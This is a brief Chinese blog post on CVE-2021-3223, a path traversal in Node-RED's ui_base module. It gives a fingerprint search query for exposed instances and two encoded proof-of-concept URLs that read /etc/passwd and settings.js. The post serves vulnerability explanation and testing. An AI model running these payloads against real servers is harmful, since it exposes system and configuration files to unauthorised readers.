Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223

本文主要是介绍Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

漏洞简介

Node-RED 在/nodes/ui_base.js中，URL与’/ui_base/js/*'匹配，然后传递给path.join，

缺乏对最终路径的验证会导致路径遍历漏洞，可以利用这个漏洞读取服务器上的敏感数据，比如settings.js

漏洞复现

title=“Node-RED”

访问页面

验证poc

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

这篇关于Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！